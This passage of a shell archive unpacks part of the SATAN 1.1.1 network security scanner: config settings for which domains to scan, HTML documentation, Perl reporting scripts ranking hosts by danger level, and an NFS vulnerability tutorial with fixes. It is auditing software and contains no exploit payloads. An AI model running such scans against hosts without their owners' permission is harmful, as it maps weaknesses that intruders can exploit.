X$untrusted_host = 0;
X

X#
X# Any exceptions on who we want to hit? E.g., stay away from the mil sites?
X# Also, you can specify *only* hit sites of a certain type; e.g. edu sites.
X#
X
X#
X# If $only_attack_these is non-null, *only* hit sites if they are of this
X# type. You can specify a domain (podunk.edu) or network number
X# (192.9.9). You can specify a list of shell-like patterns with domains
X# or networks, separated by whitespace or commas.
X#
X# Examples:
X#
X# $only_attack_these = "podunk.edu";
X# $only_attack_these = "192.9.9";
X# $only_attack_these = "podunk.edu, 192.9.9";
X#
X$only_attack_these = "";
X
X#
X# Stay away from anyone that matches these patterns.
X#
X# Example - leave government and military sites alone:

X#
X# $dont_attack_these = "gov, mil";
X$dont_attack_these = "";
X

X#
X# Set the following to nonzero if DNS (internet name service) is unavailable.
X#
X$dont_use_nslookup = 0;
X
X#
X# Should SATAN ping hosts to see if they are alive?
X#
X$dont_use_ping = 0;
X
X1;
END_OF_FILE
if test 3125 -ne `wc -c <'satan-1.1.1/config/satan.cf'`; then
echo shar: \"'satan-1.1.1/config/satan.cf'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/config/satan.cf'
fi
if test -f 'satan-1.1.1/html/docs/intro.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/intro.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/intro.html'\" $3369 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/intro.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title> Introduction</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Introduction</H1>
X<HR>
X<P>
X<A NAME="what-is-satan"><H3>What is SATAN?</H3></a>
X<p>
XSATAN is the Security Analysis Tool for Auditing Networks. In its
Xsimplest (and default) mode, it gathers as much information
Xabout remote hosts and networks as possible by examining such network
Xservices as finger, NFS, NIS, ftp and tftp, rexd, and other services.
XThe information gathered includes the presence of various network
Xinformation services as well as potential security flaws -- usually in
Xthe form of incorrectly setup or configured network services, well-known
Xbugs in system or network utilities, or poor or ignorant policy
Xdecisions. It can then either report on this data or use a simple
Xrule-based system to investigate any potential security problems.
XUsers can then examine, query, and analyze the output with an HTML
Xbrowser, such as Mosaic, Netscape, or Lynx. While the program is
Xprimarily geared towards analyzing the security implications of the
Xresults, a great deal of general network information can be gained when
Xusing the tool - network topology, network services running, types of
Xhardware and software being used on the network, etc.
X<p>
XHowever, the real power of SATAN comes into play when used in
Xexploratory mode. Based on the initial data collection and a user
Xconfigurable ruleset, it will examine the avenues of trust and
Xdependency and iterate further data collection runs over secondary
Xhosts. This not only allows the user to analyze her or his own network
Xor hosts, but also to examine the real implications inherent in network trust
Xand services and help them make reasonably educated decisions about the
Xsecurity level of the systems involved.
X<p>
X<A NAME="who-should-use"><H3>Who should use SATAN?</H3></a>
XSATAN should prove to be most useful when used by the system or security
Xadministrators who own or are responsible for the security of the
Xsystems involved. However, since it is freely available and will
Xprobably see widespread use throughout the Internet community, it should
Xbe used by anyone who is concerned about the security of their systems,
Xsince potential intruders will be able to access the same security
Xvulnerability information and since it is quite likely that it will
Xuncover security problems that were previously unknown.
X<p>
X<A NAME="how-does-it-work"><H3>How does it work?</H3></a>
XSATAN has a target acquisition program that uses <I>fping</I> to
Xdetermine whether or not a host or set of hosts in a subnet are alive.
XIt then passes this target list to an engine that drives the data
Xcollection and the main feedback loop. Each host is examined to see if
Xit has been seen before, and, if not, a list of tests/probes is run
Xagainst it (the set of tests depends on the distance the host is from
Xthe initial target and what probe level has been set.) The tests emit a
Xdata record that has the hostname, the test run, and any results found
Xfrom the probe; this data is saved in files for analysis. The user
Xinterface uses HTML to link the often vast amounts of data to more
Xcoherent and palatable results that the user can readily digest and
Xunderstand.

X
X<hr>
X<a href="satan_overview.html"> Back to the Introductory TOC/Index</a>

X</BODY>
X</HTML>
END_OF_FILE

if test 3369 -ne `wc -c <'satan-1.1.1/html/docs/intro.html'`; then
echo shar: \"'satan-1.1.1/html/docs/intro.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/intro.html'
fi
if test -f 'satan-1.1.1/html/docs/satan.probes.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/satan.probes.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/satan.probes.html'\" $3499 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/satan.probes.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>Extending SATAN </title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]">Extending SATAN</H1>
X<HR>
XOne of the best parts of SATAN is that it is so easy to modify, configure,
Xand add your own probes and vulnerability checks to the system.
XAll of the probes are files that end in <I>.satan</I> and are kept
Xin the <i>bin</i> subdirectory; the rules to add new vulnerability
Xchecks are in the <I>rules</I> subdirectory (see the section on
X<a href="satan.rules.html">satan rules</a> for more information on
Xthe rulesets.) SATAN tests for vulnerabilities are roughly done as follows:
X<UL>
X<li> Initial data collection, via <i>.satan</i> files. Save this info into
Xthe database (ASCII text files). This will be either informational or
Xvulnerability data.
X<li> When the user fires up the HTML browser, SATAN examines the database
Xfor explicit vulnerabilities, then checks the rulesets to see if it can
Xinfer other vulnerabilities (such as finding an old sendmail version or
Xsomething.)
X</UL>
XIf you want to add another <I>.satan</I> test - perhaps checking for
Xthe latest sendmail bug or something - there are a few things
Xthat must be done, depending on your test:
X
X<OL>
X<li> Create an executable that checks for the problem you'd like to scan
Xfor. It generally will take one argument - a hostname that is the
Xtarget of the probe.
X
X<li> Have the probe output a valid SATAN output record - see the
X<A HREF="satan.db.html">SATAN database format</A> document for more on
Xthis.
X
X<li> If it is a C program or something that must be processed or
Xcompiled before being run, either modify an existing SATAN makefile to
Xdo so, or create your own.
X
X<li> Decide what severity level it will be run at; either <I>light</I>,
X<I>normal</I>, or <I>heavy</I>, and modify the appropriate variable
Xin the <A HREF="satan.cf.html#attack-level">satan.cf</A> file.
X
X</OL>
X
XIf you want to modify the rulesets, see the
X<a href="satan.rules.html">satan rules</a> section to see how to
Xcreate a rule that will check for a vulnerability.
X<p>
XFinally, you'll want to create an information file (we call them tutorials.)
XThis explains the vulnerability, tells how to fix or otherwise deal with
Xthe problem, points to applicable CERT or vendor advisories, etc. There
Xare examples of these in the <i>html/tutorials/vulnerabilities</i>
Xsubdirectory.
X<p>
X<strong>Important!</strong> Look at the canonical output of the tool (see the
X<a href="satan.db.html#Canonical">satan database</a> for more details on
Xthis) - for instance, for REXD, it's <strong>"REXD access"</strong>.
X<p>
XThe filename will be identical to the canonical output, with underbars
X<i>("_")</i> instead of spaces, with an <i>".html"</i> suffix. E.g.,
Xfor REXD, the filename is <strong>REXD_access.html</strong>.
X<p>
XThat's it! Place the executable (or have <I>make</I> do so after
Xprocessing the source file) in the <i>bin</i> SATAN subdirectory with
Xthe rest of the <I>.satan</I> files. It will be run against any target
Xthat has an attack level that corresponds to your probe.
X
X<hr>
XIf you're feeling really womanly or manly, and want to give your news
Xtests or changes to the world, the best thing to do is to generate a
Xpatch using the diff command that can be run against the latest released
Xversion of SATAN. Feel free to send it to:
X<p>
X<ADDRESS>sa...@fish.com</ADDRESS>
X
X<hr>

X<a href="satan_reference.html"> Back to the Reference TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 3499 -ne `wc -c <'satan-1.1.1/html/docs/satan.probes.html'`; then
echo shar: \"'satan-1.1.1/html/docs/satan.probes.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/satan.probes.html'
fi
if test -f 'satan-1.1.1/html/docs/satan_overview.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/docs/satan_overview.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/docs/satan_overview.html'\" $2895 characters$
sed "s/^X//" >'satan-1.1.1/html/docs/satan_overview.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title> SATAN Overview </title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../images/satan.gif" ALT="[SATAN IMAGE]"> SATAN Overview </H1>
X<H2>(Security Administrator Tool for Analyzing Networks)</H2>
X<HR>
X
X<OL>
X<LI><A HREF="intro.html"><STRONG>Introduction</STRONG></A>
X<OL>
X<LI><A HREF="intro.html#what-is-satan">What is SATAN?</A>
X<LI><A HREF="intro.html#who-should-use">Who should use it?</A>
X<LI><A HREF="intro.html#how-does-it-work">How does it work?</A>
X</OL>
X
X<p>
X<LI><A HREF="trust.html"><STRONG>The most important concept - trust</STRONG></A>
X
X<p>
X<LI><A HREF="getting_started.html"><STRONG>Getting started</STRONG></A>
X<OL>
X<LI><A HREF="getting_started.html#what-you-need">What you need to do to
X run SATAN even if you don't want to read documentation</A>
X<LI><A HREF="getting_started.html#getting-n-compiling">Getting and compiling
X all those programs if you don't have them already</A>
X<LI><A HREF="getting_started.html#satan-files">What are all the files for?</A>
X</OL>
X
X<p>
X<LI><A HREF="system_requirements.html"><STRONG>System requirements</STRONG></A>
X<OL>
X<LI><A HREF="system_requirements.html#OS">OS</A>
X<LI><A HREF="system_requirements.html#Hardware">Platform</A>
X<LI><A HREF="system_requirements.html#diskspace">Disk space</A>
X<LI><A HREF="system_requirements.html#memory">Memory</A>
X<LI><A HREF="system_requirements.html#other-requirements">Required software tools</A>
X</OL>
X
X<p>
X<LI><A HREF="dangers.html"><STRONG>Dangers of SATAN</STRONG></A>
X<OL>
X<LI><A HREF="dangers.html#leashing-satan">Controlling SATAN</A>
X<LI><A HREF="dangers.html#boundary">Boundary issues - keeping track of where it goes</A>
X<LI><A HREF="dangers.html#being-friendly">Being a very unfriendly neighbor</A>
X<LI><A HREF="dangers.html#attack-or-not">Attacking vs. probing vs. scanning</A>
X<LI><A HREF="dangers.html#legal">Legal problems with running SATAN</A>
X</OL>
X<p>
X<LI><A HREF="design.html"><STRONG>Design goals</STRONG></A>
X<OL>
X<LI><A HREF="design.html#toolkit">Toolkit approach</A>
X<LI><A HREF="design.html#speed-optimization">Speed/optimization</A>
X</OL>
X<p>
X<LI><A HREF="philosophy.html"><STRONG>Philosophical Musings</STRONG></A>
X<OL>
X<LI><A HREF="philosophy.html#why-build">Why build it?</A>
X<LI><A HREF="philosophy.html#why-scan">Why does it scan sites other than your own?</A>
X<LI><A HREF="philosophy.html#white-hats">Why wasn't there a limited distribution, to only the "white hats"?</A>
X<LI><A HREF="philosophy.html#future">Future directions</A>
X</OL>
X
X<p>
X<LI><STRONG>References, Acknowledgements</STRONG>
X<OL>
X<LI><A HREF="acknowledgements.html">Acknowledgements and dedications</A>
X<LI><A HREF="references.html">References</A>
X<LI><A HREF="copyright.html">Copyright notice</A>
X<LI><A HREF="authors.html">About the authors</A>
X</OL>
X
X<p>
X<hr>

X<a href="../satan_documentation.html"> Back to the Documentation TOC</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 2895 -ne `wc -c <'satan-1.1.1/html/docs/satan_overview.html'`; then
echo shar: \"'satan-1.1.1/html/docs/satan_overview.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/satan_overview.html'
fi
if test -f 'satan-1.1.1/html/reporting/satan_info_host.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_info_host.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_info_host.pl'\" $3192 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_info_host.pl' <<'END_OF_FILE'
X#
X# Show information about a specific host.
X#
X($_host) = split(/,/, $html_script_args);
X($_type = $hosttype{$_host}) =~ tr / \//?!/;
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<title> Results - $_host </title>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC=$HTML_ROOT/images/satan.gif> Results - $_host </H1>
X<hr>
X<h3>General host information:</h3>
X<ul>
XEOF
X
X#
X# Refresh the host type and service tables.
X#
X&make_hosttype_info();
X&make_service_info();
X&make_subnet_info();
X
X$_exists = 0;
X
Xif (exists($hosttype{$_host})) {
X print CLIENT <<EOF;
X <li>Host type: <A HREF="satan_info_OStype.pl,$_type,">$hosttype{$_host}</A>
XEOF
X $_exists = 1;
X}
X
Xif (exists($server_info{$_host})) {
X for (sort split(/\n/, $server_info{$_host})) {
X # Mask blanks and slashes
X ($_service = $_) =~ tr / \//?!/;
X print CLIENT <<EOF;
X <li> <A HREF="satan_info_servers.pl,$_service,"> $_ </A> server
XEOF
X }
X $_exists = 1;
X}
X
Xif (exists($client_info{$_host})) {
X for (sort split(/\n/, $client_info{$_host})) {
X # Mask blanks and slashes
X ($_service = $_) =~ tr / \//?!/;
X print CLIENT <<EOF;
X <li> <A HREF="satan_info_clients.pl,$_service,"> $_ </A> client
XEOF
X }
X $_exists = 1;
X}
X
Xif (exists($all_hosts{$_host})) {
X ($_subnet = $all_hosts{$_host}{IP}) =~ s/\.[^.]*$//;
X print CLIENT <<EOF;
X <li> Subnet <A HREF="satan_results_subnet.pl,$_subnet,"> $_subnet </A>
XEOF
X $_exists = 1;
X}
X
Xif (exists($total_trustee_count{$_host})) {
X $_count = split(/\s+/, $total_trustee_names{$_host});
X print CLIENT <<EOF;
X <li> $_count
X <A HREF="satan_results_trusting.pl,$_host,trustee_type,"> Trusting host(s) </a>
XEOF
X $_exists = 1;
X}
X
Xif (exists($total_trusted_count{$_host})) {
X $_count = split(/\s+/, $total_trusted_names{$_host});
X print CLIENT <<EOF;
X <li> $_count
X <A HREF="satan_results_trusted.pl,$_host,trusted_type,"> Trusted host(s) </a>
XEOF
X $_exists = 1;
X}
X
Xif (exists($all_hosts{$_host}) && defined($all_hosts{$_host}{'attack'})) {
X @_level = ('none', 'light', 'normal', 'heavy', 'all out');
X print CLIENT <<EOF;
X <li> Scanning level: @_level[1 + $all_hosts{$_host}{'attack'}]
XEOF
X $_exists = 1;
X}
X
Xif (exists($all_hosts{$_host}) && defined($all_hosts{$_host}{'time'})
X && $all_hosts{$_host}{'time'} > 1) {
X $_time = &ctime($all_hosts{$_host}{'time'});
X print CLIENT <<EOF;
X <li> Last scan: $_time
XEOF
X $_exists = 1;
X}
X
X
Xprint CLIENT "</ul>\n";
X
Xif (exists($severity_host_type_info{$_host})) {
X print CLIENT "<h3>Vulnerability information:</h3><ul>\n";
X for (keys %{$severity_host_type_info{$_host}}) {
X ($_tutorials = $_) =~ tr / /_/;
X for (sort split(/\n/, $severity_host_type_info{$_host}{$_})) {
X &satan_split($_);
X print CLIENT <<EOF;
X <li> <A HREF="$HTML_ROOT/tutorials/vulnerability/$_tutorials.html">$text</A>
XEOF
X }
X }
X $_exists = 1;
X}
Xprint CLIENT <<EOF;
X</ul>
XEOF
X
Xif ($_exists) {
X print CLIENT <<EOF;
X <h3>Actions:</h3>
X <ul>
X <li> <A HREF="$HTML_SERVER/running/satan_run_form.pl,$_host,">Scan this host</a>
X </ul>
XEOF
X} else {
X print CLIENT <<EOF;
X <h3>No information found on host $_host.</h3>
XEOF
X}

X
Xprint CLIENT <<EOF;
X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 3192 -ne `wc -c <'satan-1.1.1/html/reporting/satan_info_host.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_info_host.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_info_host.pl'
fi
if test -f 'satan-1.1.1/html/reporting/satan_results_danger.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/reporting/satan_results_danger.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/html/reporting/satan_results_danger.pl'\" $3459 characters$
sed "s/^X//" >'satan-1.1.1/html/reporting/satan_results_danger.pl' <<'END_OF_FILE'
X#
X#
X#
X
Xprint CLIENT <<EOF;
X<HTML>
X<HEAD>
X<TITLE>Vulnerabilities - Danger Levels</TITLE>
X<LINK REV="made" HREF="mailto:satan\@fish.com">
X</HEAD>
X<BODY>
X<H1><IMG SRC="$HTML_ROOT/images/satan.gif" ALT="*"> Vulnerabilities - Danger Levels</H1>
X<HR>
XEOF
X;
X
X$_rs = $_us = $_ns = $_uw = $_ur = $_nw = $_nr = $_nfs = "";
X
X# make some indices...
Xif (sizeof(*severity_levels) > 0) {
X for $_type (sort keys %severity_levels) {
X if ($_type eq "rs") {
X $_rs = "<LI><A HREF=\"#root\">Root shell</A>"; }
X elsif ($_type eq "us") {
X $_us = "<LI><A HREF=\"#user\">User shell</A>"; }
X elsif ($_type eq "ns") {
X $_ns = "<LI><A HREF=\"#unprivileged\">Unprivileged shell</A>";}
X elsif ($_type eq "uw") {
X $_uw = "<LI><A HREF=\"#user file write\">User file write</A>"; }
X elsif ($_type eq "uw") {
X $_ur = "<LI><A HREF=\"#user file read\">User file read</A>"; }
X elsif ($_type eq "nr") {
X $_nr = "<LI><A HREF=\"#unpriv file read\">Unprivileged file read</A>"; }
X elsif ($_type eq "nw") {
X $_nw = "<LI><A HREF=\"#unpriv file write\">Unprivileged file write</A>"; }
X elsif ($_type eq "x") {
X $_nfs = "<LI><A HREF=\"#NFS\">NFS</A>"; }
X }
X
Xprint CLIENT <<EOF;
X<h3>Table of contents</h3>
X<ul>
X$_rs
X$_us
X$_ns
X$_uw
X$_ur
X$_nr
X$_nw
X$_nfs
X</ul>
XNote: hosts may appear in multiple categories.
XEOF
X }
X
X&make_severity_info();
X
Xif (sizeof(*severity_levels) > 0) {
X for $_type (sort keys %severity_levels) {
X
X # how serious is it?
X if ($_type eq "rs") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="root"><H3> Root shell Problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X elsif ($_type eq "us") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="user"><H3> User shell Problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X elsif ($_type eq "ns") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="unprivileged"> <H3> "nobody" shell Problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X elsif ($_type eq "ur") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="user file read"> <H3> User reading file problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X elsif ($_type eq "uw") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="user file write"> <H3> User writing file problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X elsif ($_type eq "nr") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="unpriv file read"> <H3> "nobody" reading file problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X elsif ($_type eq "nw") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="unpriv file write"> <H3> "nobody" writing file problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X elsif ($_type eq "x") {
X print CLIENT <<EOF;
X <HR>
X <A NAME="NFS"> <H3> NFS Problems </H3></A>
X <HL>
X <UL>
XEOF
X }
X $_last_tmp = "";
X $_last_txt = "";
X # split all the targets into separate lines
X for $_tmp (sort keys %{$severity_levels{$_type}}) {
X for (sort split(/\n/, $severity_levels{$_type}{$_tmp})) {
X &satan_split($_);
X ($_tutorial = $service_output) =~ tr / /_/;
X # just weed out the dups
X next if ($_last_tmp eq $_tmp && $text eq $_last_txt);
X $_last_tmp = $_tmp;
X $_last_txt = $text;
X print CLIENT <<EOF;
X <li>
X <a href="satan_info_host.pl,$_tmp,">$_tmp</a>
X <a href="$HTML_ROOT/tutorials/vulnerability/$_tutorial.html">($text)</a>
XEOF
X }

X }
X print CLIENT <<EOF;

X </UL>
XEOF
X }
X }
Xelse {
X print CLIENT <<EOF;
X <P> No vulnerability information found.
XEOF
X }

X
X print CLIENT <<EOF;

X<hr> <a href=$HTML_STARTPAGE> Back to the SATAN start page </a> |
X<a href=analysis.pl> Back to SATAN Reporting and Analysis </a>
X</BODY>
X</HTML>
XEOF
END_OF_FILE

if test 3459 -ne `wc -c <'satan-1.1.1/html/reporting/satan_results_danger.pl'`; then
echo shar: \"'satan-1.1.1/html/reporting/satan_results_danger.pl'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/reporting/satan_results_danger.pl'
fi
if test -f 'satan-1.1.1/html/tutorials/first_time/analyzing.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/first_time/analyzing.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/first_time/analyzing.html'\" $2747 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/first_time/analyzing.html' <<'END_OF_FILE'
X<title>Analyzing SATAN output</title>
X<H1><IMG SRC="../../images/satan.gif"> Analyzing SATAN output</H1>
X<HR>
X<p>
XLearning how to effectively interpret the results of a SATAN scan is
Xthe most difficult part about using SATAN. This is partly because
Xthere is no "correct" security level. "Good" security is very much
Xdependent on the policies and concerns of the site or system involved.
X<p>
XIn addition, some of the concepts used in SATAN (such as why trust
Xand network information can be so damaging) and many of the options
Xthat can be chosen (like proximity, proximity descent, attack filters,
Xetc.) will not be very familiar to many system administrators. It
Xis important to read and understand the documentation to use the tool
Xeffectively.
X<p>
XIn the reports if there is a host listed with a red dot
X(<IMG SRC="../../dots/reddot.gif">) next to it, that means the
Xhost has a vulnerability that could compromise it. A black dot
X(<IMG SRC="../../dots/blackdot.gif">) means that no vulnerabilites
Xhave been found for that particular host yet. Clicking on hyperlinks

Xwill give you more information on that host, network, piece of
Xinformation, or vulnerability, just as expected.
X<p>

XFrom the control panel in the HTML interface, select
X<I>SATAN Reporting & Data Analysis</I>. You will then be
Xprompted with a wealth of choices; when first learning to use
Xthe tool, the <I>Vulnerabilities</I> section will probably
Xbe the one of the most immediate interest. In that section,
Xthe <I>By Approximate Danger Level</I> link is a good place
Xto start. If you find no warnings there, congratulations! Note
Xthat this does <U>NOT</U> mean that your host is secure - it
Xsimply means that SATAN could not find any problems. You
Xmight try scanning your targets at a higher level and check this
Xagain; in any case, you should investigate the other categories
X(Hosts and Trust) in the reporting page.
X<p>
XThe best way to learn what SATAN can do for you is by using it -
Xscanning networks and examining the results with the Report and
XAnalysis tools can reveal interesting things about your network.
XRemember, anyone has access to this informtion, so act accordingly!
X<p>
XReading, or at least browsing through the full documentation is
Xstrongly recommended - this tutorial merely covered the very basic
Xcapabilities of SATAN. There are a wealth of possible options that
Xcan be used to unleash SATAN's full potential. Be careful, however,
Xbecause it is easy to unwittingly make your neighbors think that you're
Xtrying to attack them with the scans - <U>always</U> be certain that
Xyou have permission to scan any potential hosts that you're thinking
Xof testing.
X
X<hr>
X<a href=../../satan_documentation.html> Back to the SATAN Documentation Index</a>
X
END_OF_FILE
if test 2747 -ne `wc -c <'satan-1.1.1/html/tutorials/first_time/analyzing.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/first_time/analyzing.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/first_time/analyzing.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html'\" $2810 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<TITLE>Tutorial - Unprivileged NFS access</TITLE>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1><IMG SRC="../../images/satan.gif">Unprivileged NFS access</H1>
X
X<HR>
X
X<H3>Summary</H3>
X
XNFS server executes requests from unprivileged user programs.

X
X<H3>Impact</H3>
X

XA malicious user can execute NFS file access requests on behalf of any user.

X
X<H3>Background</H3>
X

XWhen an NFS client host wants to access a remote file or directory, its
Xoperating system sends a request to the NFS server. The request
Xspecifies, among others, a file identifier, the operation (read, write,
Xchange permission, etc.), and the identity of the user on whose behalf
Xthe operation is to be done.
X
X<p>
X
XBy default, the user identity is specified with the UNIX numeric user
Xand group ids. With this scheme, also called AUTH_UNIX, the server
Xsimply believes anything that the client sends it.

X
X<H3>The problem</H3>
X

XAn NFS request is nothing but a network message. Any user can run a
Xprogram that generates arbitrary NFS requests. Such programs have been
Xavailable for several years, and writing them does not require unusual
Xprogramming skills.
X
X<p>
X
XWhen an NFS server accepts requests with AUTH_UNIX authentication from
Xunprivileged user programs, a malicious user can execute file access
Xrequests on behalf of any user. Reason: with AUTH_UNIX authentication,
Xthe user identity is nothing but a few user and group ID numbers in a
Xnetwork message.
X
X<H3>Fix</H3>
X
XThe fix is to avoid AUTH_UNIX authentication and to use something that
Xinvolves cryptography. For example, secure NFS with DES or Kerberos
Xcredentials. Unfortunately, many NFS implementations support AUTH_UNIX
Xauthentication only. Consult your system documentation.
X
X<p>
X
XA partial, but more common, solution is to configure the NFS server,
Xand where possible, the mount daemon, to accept requests only from
Xprivileged system programs (such as UNIX kernels), and to reject NFS
Xrequests that are sent by unprivileged user programs.
X
X<p>
X
X<ul>
X
X<li>SunOS 4 administrators modify <tt>/etc/rc.local</tt>
X
X<ul>
X
X<li><tt>rpc.mountd</tt> (no -n option)
X
X<li><tt>echo "nfs_portmon/W1" | adb -w /vmunix /dev/kmem</tt>
X
X</ul>
X
X<p>
X
X<li>SunOS 5 administrators modify <tt>/etc/system</tt>
X
X<ul>
X
X<li><tt>set nfs:nfs_portmon = 1</tt>
X
X</ul>
X

X</ul>
X
X<p>
X

XOn other systems, the mountd command-line options differ, and the
Xkernel variable may be called <em>nfsportmon</em> or something
Xsimilar.
X
X<p>
X
X<strong>Note: rejecting NFS requests from unprivileged user programs
Xdoes not protect your servers against malicious superusers or against
Xmalicious PC programs.</strong>
X
X<H3>Other tips</H3>
X
X<ul>
X
X<li>Where practical, export file systems read-only.
X
X<li>Consider blocking ports 2049 (nfs) and 111 (portmap) on your
Xrouters.
X
X</ul>

X</BODY>
X</HTML>
END_OF_FILE

if test 2810 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/NFS_export_to_unprivileged_programs.html'
fi
if test -f 'satan-1.1.1/perl/todo.pl' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/perl/todo.pl'\"
else
echo shar: Extracting \"'satan-1.1.1/perl/todo.pl'\" $3574 characters$
sed "s/^X//" >'satan-1.1.1/perl/todo.pl' <<'END_OF_FILE'
X#
X# add_todo($record) add one record to the new todo list.
X#
X# process_todos() iterates over the new todo list and generates new facts.
X#
X# save_todos($path) saves the old todos to the named file.
X#
X# drop_old_todos($host) forget everything we know about a host.
X#
X# read_todos($path) load tables from file.
X#
X# merge_todos($path) merge with in-core tables.
X#
X# version 2, Mon Mar 20 19:47:07 1995, last mod by wietse
X#
Xrequire 'perl/shell.pl';
X
X#
X# Add one probe to the new todo list.
X#
Xsub add_todo {
Xlocal($host, $tool, $args) = @_;
Xlocal($record);
X
X$record = "$host|$tool|$args";
X
Xif (!exists($old_todos{$record}) && !exists($new_todos{$record})) {
X $new_todos{$record} = $record;
X print "Add-todo: $record\n" if $debug;
X }
X}
X
X#
X# Add one probe to the new todo list, ignore args when looking for dups.
X#
Xsub add_todo_ignore_args {
Xlocal($host, $tool, $args) = @_;
Xlocal($key, $record);
X
X$key = "$host|$tool";
X$record = "$host|$tool|$args";
X
Xif (!exists($old_todos{$key})) {
X $new_todos{$key} = $record;
X print "Add-todo: $key ($args)\n" if $debug;
X }
X}
X
X#
X# Iterate over the new todo list until nothing new shows up. Skip tools
X# that we aren't supposed to run at this attack level.
X#
Xsub process_todos {
Xlocal($key,%temp_todos,$allowed_tools);
Xlocal($target, $tool, $args, $level, $probe);
X
Xwhile (sizeof(*new_todos) > 0) {
X %temp_todos = %new_todos;
X %new_todos = ();
X for $key (keys %temp_todos) {
X ($target, $tool, $args) = split(/\|/, $temp_todos{$key}, 3);
X next unless exists($all_hosts{$target});
X $level = $all_hosts{$target}{'attack'};
X next unless $level >= 0;
X for $probe (@{$all_attacks[$level]}) {
X if ($tool eq $probe || "$tool?" eq $probe || $probe eq "*?") {
X $old_todos{$key} = 1;
X &run_next_todo($target, $tool, $args);

X last;
X }
X }
X }
X }

X}
X
X#
X# Save old todo list to file.
X#
Xsub save_todos {
Xlocal($path) = @_;
X
Xopen(TODO, ">$path") || die "cannot save old todo list to $path: $!";
Xfor $key (keys %old_todos) {
X print TODO "$key\n";
X }
Xclose(TODO);
X}
X
X#
X# Reset todo tables and derivatives
X#
Xsub clear_todos {
X%new_todos = ();
X%old_todos = ();
X}
X
X#
X# Drop old entries on a specific host.
X#
Xsub drop_old_todos {
X local($host) = @_;
X local($key, $target, $tool, $args);
X
X for $key (keys %old_todos) {
X ($target, $tool, $args) = split(/\|/, $key);
X delete $old_todos{$key} if $target eq $host;
X }
X}
X
X#
X# Read old todo list from file.
X#
Xsub read_todos {
Xlocal($path) = @_;
X
X&clear_todos();
X&merge_todos($path);
X}
X
X#
X# Merge old todo list with in-core table.
X#
Xsub merge_todos {
